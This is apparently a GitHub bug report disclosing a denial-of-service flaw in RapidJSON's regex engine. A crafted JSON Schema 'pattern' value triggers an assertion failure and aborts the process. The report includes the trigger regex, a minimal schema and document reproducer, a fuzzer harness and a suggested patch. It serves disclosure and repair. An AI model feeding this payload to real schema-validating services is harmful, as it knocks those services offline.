Skip to content

Assertion Failure in RapidJSON Regex Engine via GenericRegex::Eval causes Process Crash #2373

@OwenSanzas

Description

@OwenSanzas

Summary

RapidJSON's internal regex engine (regex.h) hits an assertion failure in Eval() when processing malformed regular expressions from JSON Schema "pattern" fields. A crafted regex like ^s(}}}|)}}}}}}}}+ causes operand stack underflow, triggering assert(operandStack.GetSize() >= sizeof(Frag) * 2) at regex.h:381. Exploitable when an application validates JSON against untrusted schemas.

Root Cause

GenericRegex::Eval() at regex.h:381 assumes the operand stack has at least 2 Frag entries during alternation (|) processing. The regex compiler does not validate the pattern structure before evaluation. A malformed regex containing nested groups with alternation operators causes the operand stack to underflow, violating the assertion. The compiler accepts syntactically invalid patterns without error, passing them directly to the evaluator.

Vulnerable Code (regex.h:381)

template <typename Encoding, typename Allocator>
bool GenericRegex<Encoding, Allocator>::Eval(
    Stack<Allocator>& operandStack, Operator op) {
  // ...
  case kAlternation: {
    // Assumes 2 operands are available on the stack
    assert(operandStack.GetSize() >= sizeof(Frag) * 2);  // ASSERTION FAILURE
    Frag e2 = *operandStack.template Pop<Frag>(1);
    Frag e1 = *operandStack.template Pop<Frag>(1);
    // ...
  }
}

Trigger Pattern

Regex:  ^s(}}}|)}}}}}}}}+

The nested group "(}}}|)" with alternation followed by repeated closing braces
causes the operand stack to be consumed faster than populated, resulting in
underflow when the alternation operator is evaluated.

Vulnerability Description

RapidJSON's internal regex engine, used for JSON Schema "pattern" validation, does not properly validate regular expression syntax before evaluating the pattern. The Eval() function in GenericRegex processes operators assuming the operand stack is well-formed, with assert() guards protecting against stack underflow. When a malformed regex such as ^s(}}}|)}}}}}}}}+ is provided via a JSON Schema "pattern" field, the operand stack underflows during alternation processing, triggering the assertion at regex.h:381. This is exploitable in any application that validates JSON documents against untrusted or user-provided JSON Schemas. In web services accepting JSON Schema definitions, this becomes a network-exploitable denial of service (the attacker supplies a malicious schema, and any subsequent validation against it crashes the service).

Severity

Medium (CVSS 5.5)

PoC

Production Reproduction

Production application: workspace/prod_repro/json_schema_validator.cpp - JSON Schema validation service using rapidjson::SchemaDocument, rapidjson::SchemaValidator public API.

# Build
clang++ -fsanitize=address -g -O1 -I/path/to/rapidjson/include \
    workspace/prod_repro/json_schema_validator.cpp -o json_schema_validator

# Run with crash input
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator crash-2d2aae10f939c969030c33c3289f2c4188642165

Standalone Reproduction

Also reproducible with standalone JSON files:

Schema (schema.json):

{"pattern":"^s(}}}|)}}}}}}}}+"}

Document (doc.json):

"hello"
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator schema.json doc.json

Sanitizer Output

Note: This is an assert() failure, not a memory error. The program calls abort() directly, so ASAN does not produce a stack trace — the assertion message and Aborted exit status is the complete output.

json_schema_validator: /usr/include/rapidjson/internal/regex.h:381: bool rapidjson::internal::GenericRegex<rapidjson::UTF8<>>::Eval(Stack<Allocator> &, Operator) [Encoding = rapidjson::UTF8<>, Allocator = rapidjson::CrtAllocator]: Assertion `operandStack.GetSize() >= sizeof(Frag) * 2' failed.
Aborted (exit code 134)

Suggested Fix

--- a/include/rapidjson/internal/regex.h
+++ b/include/rapidjson/internal/regex.h
@@ -378,7 +378,8 @@ bool GenericRegex<Encoding, Allocator>::Eval(
   case kAlternation: {
-    RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2);
+    if (operandStack.GetSize() < sizeof(Frag) * 2)
+      return false;  // Reject malformed regex instead of asserting
     Frag e2 = *operandStack.template Pop<Frag>(1);

Fuzzer Source Code

// rj_schema_fuzzer.cc — Fuzz rapidjson SchemaValidator
#include <cstdint>
#include <cstddef>
#include <string>
#include <rapidjson/document.h>
#include <rapidjson/schema.h>
#include <rapidjson/stringbuffer.h>
#include <rapidjson/error/en.h>

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    if (size < 4) return 0;
    size_t split = size / 2;
    const std::string schema_str(reinterpret_cast<const char*>(data), split);
    const std::string doc_str(reinterpret_cast<const char*>(data + split), size - split);

    rapidjson::Document schema_doc;
    if (schema_doc.Parse(schema_str.c_str()).HasParseError()) return 0;
    if (!schema_doc.IsObject()) return 0;

    rapidjson::SchemaDocument schema(schema_doc);
    rapidjson::Document doc;
    if (doc.Parse(doc_str.c_str()).HasParseError()) return 0;

    rapidjson::SchemaValidator validator(schema);
    if (!doc.Accept(validator)) {
        rapidjson::StringBuffer sb;
        validator.GetInvalidSchemaPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
        sb.Clear();
        (void)validator.GetInvalidSchemaKeyword();
        validator.GetInvalidDocumentPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
    }
    validator.Reset();
    doc.Accept(validator);
    return 0;
}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions